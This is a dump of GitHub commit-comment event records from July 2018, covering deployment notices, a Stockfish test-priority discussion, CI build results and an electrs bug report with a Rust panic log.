{"id":"7966858959","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29711463,"position":null,"line":null,"path":null,"commit_id":"5389ffa4c4955d7ba81a99d6729a6a864bdb172f","created_at":"2018-07-15T05:52:25Z","updated_at":"2018-07-15T05:52:25Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#pr-3](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#pr-3).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-3-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-15T05:52:25Z"}
{"id":"7966860750","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29711464,"position":null,"line":null,"path":null,"commit_id":"9a092ffbdda9364fc18f83295f99251546dd83c8","created_at":"2018-07-15T05:54:33Z","updated_at":"2018-07-15T05:54:33Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#ci-17](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#ci-17).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-17-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-15T05:54:33Z"}
{"id":"7966861958","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29711466,"position":null,"line":null,"path":null,"commit_id":"6e13032ece94a8519cd3331bc2c50cb8ad52e433","created_at":"2018-07-15T05:55:50Z","updated_at":"2018-07-15T05:55:50Z","author_association":"OWNER","body":"Hmmm. . ok. . . no worries.  I would have thought that removing the\npopcount would qualify.  Oh well.  I will test 0,4.\n\nOn Sat, Jul 14, 2018 at 11:51 PM, Tom Vijlbrief <notifications@github.com>\nwrote:\n\n> Resulting machine code will still be similar so [0,4] IMO\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/6e13032ece94a8519cd3331bc2c50cb8ad52e433#commitcomment-29711461>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSGWKzM0jGIb8qSRufDAfbUxbSbJvks5uGthvgaJpZM4VQHkp>\n> .\n>\n\n\n\n-- \nMichael T. Whiteley\nmobile: 801.707.6886\n"}},"created_at":"2018-07-15T05:55:50Z"}
{"id":"7966862944","type":"CommitCommentEvent","actor":{"login":"dance2die"},"repo":{"name":"dance2die/landingpage"},"payload":{"comment":{"id":29711468,"position":null,"line":null,"path":null,"commit_id":"5afc8fde776f12fe9dcaf91b2e3332749313c091","created_at":"2018-07-15T05:56:55Z","updated_at":"2018-07-15T05:56:55Z","author_association":"OWNER","body":"This is for **Add Google Analytics #13**"}},"created_at":"2018-07-15T05:56:55Z"}
{"id":"7966863331","type":"CommitCommentEvent","actor":{"login":"dance2die"},"repo":{"name":"dance2die/landingpage"},"payload":{"comment":{"id":29711469,"position":null,"line":null,"path":null,"commit_id":"6151ddd3827f9327205526ba7fba165c26e510fb","created_at":"2018-07-15T05:57:21Z","updated_at":"2018-07-15T05:57:21Z","author_association":"OWNER","body":"This is for **Add Google Analytics #13**"}},"created_at":"2018-07-15T05:57:21Z"}
{"id":"7966864361","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29711473,"position":null,"line":null,"path":null,"commit_id":"a79e9b55a2fb72722f84a0bdc61c4eefa80350c3","created_at":"2018-07-15T05:58:28Z","updated_at":"2018-07-15T05:58:28Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#ci-19](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#ci-19).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-19-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-15T05:58:28Z"}
{"id":"7966865051","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29711474,"position":null,"line":null,"path":null,"commit_id":"6e13032ece94a8519cd3331bc2c50cb8ad52e433","created_at":"2018-07-15T05:59:16Z","updated_at":"2018-07-15T05:59:16Z","author_association":"NONE","body":"I expect that the compiler produces nearly identical code for both tests. Because we are low on resources currently, it's fair to run one of these at prio -1. "}},"created_at":"2018-07-15T05:59:16Z"}
{"id":"7966865406","type":"CommitCommentEvent","actor":{"login":"autuwater23"},"repo":{"name":"autuwater23/DemoOne"},"payload":{"comment":{"id":29711475,"position":3,"line":3,"path":"LICENSE","commit_id":"7c6834b5612bab4b83f5902c120c700e6ac76dc0","created_at":"2018-07-15T05:59:46Z","updated_at":"2018-07-15T05:59:46Z","author_association":"OWNER","body":" s  "}},"created_at":"2018-07-15T05:59:46Z"}
{"id":"7966866155","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29711485,"position":null,"line":null,"path":null,"commit_id":"eb25156b9bd82808b57ef5cdf4bf9b5cb7be4d75","created_at":"2018-07-15T06:00:23Z","updated_at":"2018-07-15T06:00:23Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#ci-21](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#ci-21).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-21-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-15T06:00:23Z"}
{"id":"7966866855","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29711491,"position":null,"line":null,"path":null,"commit_id":"ab4747ce7e527feaad5b1bb861753a2393c5c4b7","created_at":"2018-07-15T06:01:02Z","updated_at":"2018-07-15T06:01:02Z","author_association":"OWNER","body":"Fix #17 "}},"created_at":"2018-07-15T06:01:02Z"}
{"id":"7966866958","type":"CommitCommentEvent","actor":{"login":"FDirectionClear"},"repo":{"name":"FDirectionClear/summertraining"},"payload":{"comment":{"id":29711493,"position":null,"line":null,"path":null,"commit_id":"bbc4e7ab6de2872d7f024188fd9636fe830ced80","created_at":"2018-07-15T06:01:06Z","updated_at":"2018-07-15T06:01:06Z","author_association":"OWNER","body":"在这里留言的是本次修改的信息。"}},"created_at":"2018-07-15T06:01:06Z"}
{"id":"7966867515","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29711494,"position":null,"line":null,"path":null,"commit_id":"9b263dc22803e1abc4c78b3e0107a0a64c0ff7d7","created_at":"2018-07-15T06:01:38Z","updated_at":"2018-07-15T06:01:38Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#ci-23](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#ci-23).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-23-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-15T06:01:38Z"}
{"id":"7966867822","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29711495,"position":null,"line":null,"path":null,"commit_id":"6e13032ece94a8519cd3331bc2c50cb8ad52e433","created_at":"2018-07-15T06:01:55Z","updated_at":"2018-07-15T06:01:55Z","author_association":"OWNER","body":"Ok. Thx tom.  I set the prio on the 2nd test to -1.\n\nOn Sat, Jul 14, 2018, 11:59 PM Tom Vijlbrief <notifications@github.com>\nwrote:\n\n> I expect that the compiler produces nearly identical code for both tests.\n> Because we are low on resources currently, it's fair to run one of these at\n> prio -1.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/6e13032ece94a8519cd3331bc2c50cb8ad52e433#commitcomment-29711474>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSNZsbTWyHua1FA9Xe6VSojnwjpIpks5uGto1gaJpZM4VQHkp>\n> .\n>\n"}},"created_at":"2018-07-15T06:01:55Z"}
{"id":"7966868459","type":"CommitCommentEvent","actor":{"login":"asiagromasia"},"repo":{"name":"asiagromasia/ITC250_branching"},"payload":{"comment":{"id":29711498,"position":8,"line":8,"path":"README.md","commit_id":"86f3e98813f95961330b4dc57e2f90e34ef5fd62","created_at":"2018-07-15T06:02:35Z","updated_at":"2018-07-15T06:02:35Z","author_association":"OWNER","body":"He realized he was hurt but didn't remember anything...."}},"created_at":"2018-07-15T06:02:35Z"}
{"id":"7966869094","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29711501,"position":null,"line":null,"path":null,"commit_id":"cc6a57e16c5908fac88aed8ffc11301ef7d2b415","created_at":"2018-07-15T06:03:16Z","updated_at":"2018-07-15T06:03:16Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#pr-4](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-15T06:03:16Z"}
{"id":"7966870076","type":"CommitCommentEvent","actor":{"login":"kitkat730"},"repo":{"name":"kitkat730/avenue"},"payload":{"comment":{"id":29711502,"position":null,"line":null,"path":null,"commit_id":"5d71b193b2fc1498fcd95b43cb49f54a2020fcd0","created_at":"2018-07-15T06:04:18Z","updated_at":"2018-07-15T06:04:18Z","author_association":"OWNER","body":"hey"}},"created_at":"2018-07-15T06:04:18Z"}
{"id":"7966870931","type":"CommitCommentEvent","actor":{"login":"asiagromasia"},"repo":{"name":"asiagromasia/ITC250_branching"},"payload":{"comment":{"id":29711504,"position":null,"line":null,"path":null,"commit_id":"86f3e98813f95961330b4dc57e2f90e34ef5fd62","created_at":"2018-07-15T06:05:16Z","updated_at":"2018-07-15T06:05:16Z","author_association":"OWNER","body":"add a start to hospital"}},"created_at":"2018-07-15T06:05:16Z"}
{"id":"7966872022","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29711506,"position":null,"line":null,"path":null,"commit_id":"b8a3109c9669365b94a8d8eaf3a1b5715df669b1","created_at":"2018-07-15T06:06:16Z","updated_at":"2018-07-15T06:06:16Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#pr-5](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#pr-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-5-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-15T06:06:16Z"}
{"id":"7966873533","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29711507,"position":null,"line":null,"path":null,"commit_id":"780d0a2af5f5c6596c9929e912de514ee79eb683","created_at":"2018-07-15T06:07:44Z","updated_at":"2018-07-15T06:07:44Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#pr-6](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#pr-6).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-6-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-15T06:07:44Z"}
{"id":"7966873869","type":"CommitCommentEvent","actor":{"login":"liangchihwei"},"repo":{"name":"destiny5420/RoleOfHero"},"payload":{"comment":{"id":29711508,"position":null,"line":null,"path":null,"commit_id":"4fc25b0d71161d8ce9eb9cc900315a37147778b0","created_at":"2018-07-15T06:08:08Z","updated_at":"2018-07-15T06:08:08Z","author_association":"COLLABORATOR","body":"Very good"}},"created_at":"2018-07-15T06:08:08Z"}
{"id":"7966874390","type":"CommitCommentEvent","actor":{"login":"MdRahman-007"},"repo":{"name":"MdRahman-007/Selenium_Spring"},"payload":{"comment":{"id":29711509,"position":null,"line":null,"path":null,"commit_id":"98bce340c6330dfb28aef789a5bb1d0fa350eb81","created_at":"2018-07-15T06:08:39Z","updated_at":"2018-07-15T06:08:39Z","author_association":"OWNER","body":"sdssdd"}},"created_at":"2018-07-15T06:08:39Z"}
{"id":"7966874578","type":"CommitCommentEvent","actor":{"login":"argcoin"},"repo":{"name":"tiagosh/AltcoinGenerator"},"payload":{"comment":{"id":29711510,"position":null,"line":null,"path":null,"commit_id":"9ce847f85f8347ebb37061d8a04accb347b49a01","created_at":"2018-07-15T06:08:51Z","updated_at":"2018-07-15T06:08:51Z","author_association":"NONE","body":"why clone version 0.14 and not the last?"}},"created_at":"2018-07-15T06:08:51Z"}
{"id":"7966875801","type":"CommitCommentEvent","actor":{"login":"Sofiabella"},"repo":{"name":"EdinburghNLP/nematus"},"payload":{"comment":{"id":29711515,"position":24,"line":24,"path":"doc/factored_neural_machine_translation.md","commit_id":"a63487e17cc717be54b296e11693795f887d7d03","created_at":"2018-07-15T06:10:12Z","updated_at":"2018-07-15T06:10:12Z","author_association":"NONE","body":"scripts"}},"created_at":"2018-07-15T06:10:12Z"}
{"id":"7966877305","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29711517,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-15T06:11:48Z","updated_at":"2018-07-15T06:11:48Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1676 of 1676 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.32%25-green.png)</a>\n"}},"created_at":"2018-07-15T06:11:48Z"}
{"id":"7966878587","type":"CommitCommentEvent","actor":{"login":"Sofiabella"},"repo":{"name":"EdinburghNLP/nematus"},"payload":{"comment":{"id":29711520,"position":24,"line":24,"path":"doc/factored_neural_machine_translation.md","commit_id":"a63487e17cc717be54b296e11693795f887d7d03","created_at":"2018-07-15T06:13:13Z","updated_at":"2018-07-15T06:13:13Z","author_association":"NONE","body":"https://github.com"}},"created_at":"2018-07-15T06:13:13Z"}
{"id":"7966879213","type":"CommitCommentEvent","actor":{"login":"Sofiabella"},"repo":{"name":"EdinburghNLP/nematus"},"payload":{"comment":{"id":29711522,"position":null,"line":null,"path":null,"commit_id":"a63487e17cc717be54b296e11693795f887d7d03","created_at":"2018-07-15T06:13:52Z","updated_at":"2018-07-15T06:13:52Z","author_association":"NONE","body":"a63487e"}},"created_at":"2018-07-15T06:13:52Z"}
{"id":"7966881884","type":"CommitCommentEvent","actor":{"login":"namhyung"},"repo":{"name":"namhyung/uftrace"},"payload":{"comment":{"id":29711528,"position":66,"line":132,"path":"INSTALL.md","commit_id":"dd562e7f0bf68780754121d6a63dae792158c091","created_at":"2018-07-15T06:16:43Z","updated_at":"2018-07-15T06:16:43Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-15T06:16:43Z"}
{"id":"7966882074","type":"CommitCommentEvent","actor":{"login":"namhyung"},"repo":{"name":"namhyung/uftrace"},"payload":{"comment":{"id":29711529,"position":67,"line":133,"path":"INSTALL.md","commit_id":"dd562e7f0bf68780754121d6a63dae792158c091","created_at":"2018-07-15T06:16:55Z","updated_at":"2018-07-15T06:16:55Z","author_association":"OWNER","body":"will change"}},"created_at":"2018-07-15T06:16:55Z"}
{"id":"7966882813","type":"CommitCommentEvent","actor":{"login":"Pentarctagon"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29711530,"position":null,"line":null,"path":null,"commit_id":"3290961db2eb00221c94f88f02f77ab640f497a4","created_at":"2018-07-15T06:17:40Z","updated_at":"2018-07-15T06:17:40Z","author_association":"MEMBER","body":"If there's an error, it would be good to fix it, if possible.  It is in the [release notes](https://github.com/wesnoth/wesnoth/blob/1.14/changelog.md#miscellaneous-and-bug-fixes) though:\r\n`Linux builds now enable security hardening by default.`"}},"created_at":"2018-07-15T06:17:40Z"}
{"id":"7966884102","type":"CommitCommentEvent","actor":{"login":"SimSync"},"repo":{"name":"e107inc/e107"},"payload":{"comment":{"id":29711537,"position":null,"line":null,"path":null,"commit_id":"7d40402760ef72e2817f2c9e94062ab282eebed6","created_at":"2018-07-15T06:19:02Z","updated_at":"2018-07-15T06:19:02Z","author_association":"CONTRIBUTOR","body":"@CaMer0n This is no automatic \"behavior\", you need to define it in admin ui to activate, correct? "}},"created_at":"2018-07-15T06:19:02Z"}
{"id":"7966884509","type":"CommitCommentEvent","actor":{"login":"abitrolly"},"repo":{"name":"abitrolly/abitrolly.github.io"},"payload":{"comment":{"id":29711538,"position":null,"line":null,"path":null,"commit_id":"8cfd434bcd6e51907ed1e703e448271b0a0ee739","created_at":"2018-07-15T06:19:29Z","updated_at":"2018-07-15T06:19:29Z","author_association":"OWNER","body":"> What is My affiliate link https://presale.deex.exchange/?ref=114477 good for? Where is the description of what it gets? Thanks.\r\n\r\nThis link was used for refferal program during the ICO. Now it is not working."}},"created_at":"2018-07-15T06:19:29Z"}
{"id":"7966884975","type":"CommitCommentEvent","actor":{"login":"nahytar"},"repo":{"name":"nahytar/scl-2018-05-bc-core-am-socialnetwork"},"payload":{"comment":{"id":29711539,"position":null,"line":null,"path":null,"commit_id":"dbd0b48e998e995ed05163476f6123b0249c2134","created_at":"2018-07-15T06:20:02Z","updated_at":"2018-07-15T06:20:02Z","author_association":"OWNER","body":"#14 "}},"created_at":"2018-07-15T06:20:02Z"}
{"id":"7966885966","type":"CommitCommentEvent","actor":{"login":"nahytar"},"repo":{"name":"nahytar/scl-2018-05-bc-core-am-socialnetwork"},"payload":{"comment":{"id":29711540,"position":null,"line":null,"path":null,"commit_id":"1d1f7caccc9c3543b7392b0c2c7ab284fe3459e7","created_at":"2018-07-15T06:21:05Z","updated_at":"2018-07-15T06:21:05Z","author_association":"OWNER","body":"#17 "}},"created_at":"2018-07-15T06:21:05Z"}
{"id":"7966894385","type":"CommitCommentEvent","actor":{"login":"Siyyo"},"repo":{"name":"uBlock-LLC/uBlock"},"payload":{"comment":{"id":29711554,"position":3,"line":135,"path":"js/async.js","commit_id":"ee610b3aad679440da51da9449b345afda6f274d","created_at":"2018-07-15T06:30:04Z","updated_at":"2018-07-15T06:30:04Z","author_association":"NONE","body":"Unblock my sites"}},"created_at":"2018-07-15T06:30:04Z"}
{"id":"7966895222","type":"CommitCommentEvent","actor":{"login":"feiwenli"},"repo":{"name":"feiwenli/blog"},"payload":{"comment":{"id":29711557,"position":7,"line":7,"path":"my-blog/.travis.yml","commit_id":"3fb403597db5025f36a00f8efe4e9826c63d9253","created_at":"2018-07-15T06:30:48Z","updated_at":"2018-07-15T06:30:48Z","author_association":"OWNER","body":"- hugo"}},"created_at":"2018-07-15T06:30:48Z"}
{"id":"7966895581","type":"CommitCommentEvent","actor":{"login":"karpovichDima"},"repo":{"name":"karpovichDima/Patterns"},"payload":{"comment":{"id":29711558,"position":null,"line":null,"path":null,"commit_id":"b14a323637978d38d1240d67ad392c70e490f7d3","created_at":"2018-07-15T06:31:11Z","updated_at":"2018-07-15T06:31:11Z","author_association":"OWNER","body":"НЕ ИСПОЛЬЗОВАТЬ (ANTI PATTERN)"}},"created_at":"2018-07-15T06:31:11Z"}
{"id":"7966895660","type":"CommitCommentEvent","actor":{"login":"Sofiabella"},"repo":{"name":"rsennrich/Bleualign"},"payload":{"comment":{"id":29711559,"position":577,"line":577,"path":"bleualign/align.py.bak","commit_id":"4005102b196bfd9d3ca787efc9b4486e47efe507","created_at":"2018-07-15T06:31:15Z","updated_at":"2018-07-15T06:31:15Z","author_association":"NONE","body":"targetgap"}},"created_at":"2018-07-15T06:31:15Z"}
{"id":"7966896472","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29711563,"position":128,"line":178,"path":"src/sass/_base.scss","commit_id":"55d708638aac2009dd64762785c9c575aba66f40","created_at":"2018-07-15T06:31:56Z","updated_at":"2018-07-15T06:31:56Z","author_association":"CONTRIBUTOR","body":"改成這樣的結構：\r\n```scss\r\n.btn-close {\r\n  &.transform img {\r\n\r\n  }\r\n  img {\r\n\r\n  }\r\n\r\n}\r\n```\r\n更容易一眼看出他們的相關性"}},"created_at":"2018-07-15T06:31:56Z"}
{"id":"7966896488","type":"CommitCommentEvent","actor":{"login":"Sofiabella"},"repo":{"name":"rsennrich/Bleualign"},"payload":{"comment":{"id":29711564,"position":76,"line":76,"path":"bleualign/align.py.bak","commit_id":"4005102b196bfd9d3ca787efc9b4486e47efe507","created_at":"2018-07-15T06:31:57Z","updated_at":"2018-07-15T06:31:57Z","author_association":"NONE","body":"Aligner"}},"created_at":"2018-07-15T06:31:57Z"}
{"id":"7966897486","type":"CommitCommentEvent","actor":{"login":"Sofiabella"},"repo":{"name":"rsennrich/Bleualign"},"payload":{"comment":{"id":29711565,"position":61,"line":61,"path":"bleualign/align.py.bak","commit_id":"4005102b196bfd9d3ca787efc9b4486e47efe507","created_at":"2018-07-15T06:33:07Z","updated_at":"2018-07-15T06:33:07Z","author_association":"NONE","body":"yield"}},"created_at":"2018-07-15T06:33:07Z"}
{"id":"7966898952","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29711567,"position":null,"line":null,"path":null,"commit_id":"d1f5c61def48b9ffd2582b23e6166729dcbd86b4","created_at":"2018-07-15T06:34:38Z","updated_at":"2018-07-15T06:34:38Z","author_association":"OWNER","body":"Fixes the 2nd issue from https://github.com/romanz/electrs/issues/16#issuecomment-405068641\r\n\r\n```\r\n2018-07-15T07:28:25.782+02:00 - DEBUG - Server listening on 127.0.0.1:42024\r\n2018-07-15T07:28:25.786+02:00 - DEBUG - BlockchainInfo { chain: \"main\", blocks: 531982, headers: 531982, bestblockhash: \"0000000000000000001e01d834dc72ce35be96727cd40bb08a7c186a7ab04ef0\", size_on_disk: 236696120949, pruned: false }\r\n2018-07-15T07:28:25.790+02:00 - DEBUG - Running accept thread\r\n2018-07-15T07:28:25.797+02:00 - DEBUG - NetworkInfo { version: 160100, subversion: \"/Satoshi:0.16.1/\" }\r\n2018-07-15T07:28:25.797+02:00 - DEBUG - opening DB at \"./new-db/mainnet\"\r\n2018-07-15T07:28:58.245+02:00 - DEBUG - applying 531965 new headers from height 0\r\n2018-07-15T07:28:58.828+02:00 - DEBUG - downloading new block headers (531965 already indexed) from 0000000000000000001e01d834dc72ce35be96727cd40bb08a7c186a7ab04ef0\r\n2018-07-15T07:28:58.829+02:00 - TRACE - downloaded 0000000000000000001e01d834dc72ce35be96727cd40bb08a7c186a7ab04ef0 block header\r\n2018-07-15T07:28:58.830+02:00 - TRACE - downloaded 0000000000000000002337949e5107b68ec86c1332bcd154c58e85707e159f19 block header\r\n2018-07-15T07:28:58.830+02:00 - TRACE - downloaded 0000000000000000001ab87a4f8652715058cccdd3a19c3916b827964322d764 block header\r\n2018-07-15T07:28:58.831+02:00 - TRACE - downloaded 00000000000000000013be3d990cdca29ddae892d62685abab88d9c06ab9925c block header\r\n2018-07-15T07:28:58.831+02:00 - TRACE - downloaded 0000000000000000000e59d4a6b71008315d436c7c700da199a240a39bed4321 block header\r\n2018-07-15T07:28:58.832+02:00 - TRACE - downloaded 0000000000000000002284798efc672de5c338392ecf7d60925239db3cc4b40b block header\r\n2018-07-15T07:28:58.832+02:00 - TRACE - downloaded 0000000000000000002040580a759f5368ae31f20149a3ebc46d1b29060ca497 block header\r\n2018-07-15T07:28:58.833+02:00 - TRACE - downloaded 0000000000000000002a191b0816ae90e5f60bc98fee3930ef88f9b6ea9e77cd block header\r\n2018-07-15T07:28:58.833+02:00 - TRACE - downloaded 00000000000000000026ade0f9f3302cbd9783a1313f630eae7d95f142349103 block header\r\n2018-07-15T07:28:58.833+02:00 - TRACE - downloaded 0000000000000000002cd49d814613483efa73ac725e2fb164310865c1b925c6 block header\r\n2018-07-15T07:28:58.834+02:00 - TRACE - downloaded 00000000000000000014105b7f22976164f3c2b4a53c965307e82782501eb3b4 block header\r\n2018-07-15T07:28:58.834+02:00 - TRACE - downloaded 00000000000000000024fb83671d996476283709f03e3c166f7fef40470a9807 block header\r\n2018-07-15T07:28:58.835+02:00 - TRACE - downloaded 0000000000000000001510cd0979ea602a14c121223db9216c01fe48d44d0d1b block header\r\n2018-07-15T07:28:58.835+02:00 - TRACE - downloaded 00000000000000000030ae5f8b361497fa489cb3b5d36b321fd8b5b387328474 block header\r\n2018-07-15T07:28:58.835+02:00 - TRACE - downloaded 00000000000000000018aa9a4f88d4721fd1061c36158b1d89eb3c2e9309c917 block header\r\n2018-07-15T07:28:58.836+02:00 - TRACE - downloaded 0000000000000000001245ecd1105dadebd5596883e854007466f8a12d36d02e block header\r\n2018-07-15T07:28:58.836+02:00 - TRACE - downloaded 0000000000000000002f677bc1750f41f4afcf2e77b1222f72d39bb4231df5b6 block header\r\n2018-07-15T07:28:58.837+02:00 - TRACE - downloaded 00000000000000000027d294975da92c638b54079e188f6c0664a01193920e49 block header\r\n2018-07-15T07:28:58.837+02:00 - INFO - best=0000000000000000001e01d834dc72ce35be96727cd40bb08a7c186a7ab04ef0 height=531982 @ 2018-07-15T05:23:44Z (18 left to index)\r\n2018-07-15T07:29:03.993+02:00 - DEBUG - applying 18 new headers from height 531965\r\n2018-07-15T07:29:03.998+02:00 - TRACE - 432 transactions in mempool (+432)\r\n2018-07-15T07:29:03.999+02:00 - WARN - no mempool entry b0e0255e93558372460e936507d6dcd49dbf8dc99bcac15299e95bb7fcf5e929: missing fees section\r\n2018-07-15T07:29:04.000+02:00 - WARN - no mempool entry f7e7e3f21f743bc492562cf9ab9cf363298286089398745262f0fd47a5094584: missing fees section\r\n2018-07-15T07:29:04.000+02:00 - WARN - no mempool entry \r\n\r\nMany others .....\r\n\r\n624a13e963a60bd1f38bf119cd4bf20846ca08ee13c8e38bc5a5a66561e07715: missing fees section\r\n2018-07-15T07:29:04.178+02:00 - WARN - no mempool entry 2e86b8278b97f7a58bcf17cbe1689a9e2b174ad25dcba7c124e4098e5b38d6ef: missing fees section\r\nthread 'main' panicked at 'assertion failed: `(left == right)`\r\n  left: `0`,\r\n right: `1003`', src/mempool.rs:218:9\r\nstack backtrace:\r\n   0: std::sys::unix::backtrace::tracing::imp::unwind_backtrace\r\n             at libstd/sys/unix/backtrace/tracing/gcc_s.rs:49\r\n   1: std::sys_common::backtrace::print\r\n             at libstd/sys_common/backtrace.rs:71\r\n             at libstd/sys_common/backtrace.rs:59\r\n   2: std::panicking::default_hook::{{closure}}\r\n             at libstd/panicking.rs:211\r\n   3: std::panicking::default_hook\r\n             at libstd/panicking.rs:227\r\n   4: std::panicking::rust_panic_with_hook\r\n             at libstd/panicking.rs:463\r\n   5: std::panicking::begin_panic_fmt\r\n             at libstd/panicking.rs:350\r\n   6: electrs::mempool::Tracker::update\r\n   7: electrs::query::Query::update_mempool\r\n   8: electrs::main\r\n   9: std::rt::lang_start::{{closure}}\r\n  10: std::panicking::try::do_call\r\n             at libstd/rt.rs:59\r\n             at libstd/panicking.rs:310\r\n  11: __rust_maybe_catch_panic\r\n             at libpanic_unwind/lib.rs:105\r\n  12: std::rt::lang_start_internal\r\n             at libstd/panicking.rs:289\r\n             at libstd/panic.rs:374\r\n             at libstd/rt.rs:58\r\n  13: main\r\n  14: __libc_start_main\r\n  15: _start\r\n2018-07-15T07:42:29.028+02:00 - TRACE - closing DB\r\n```"}},"created_at":"2018-07-15T06:34:38Z"}
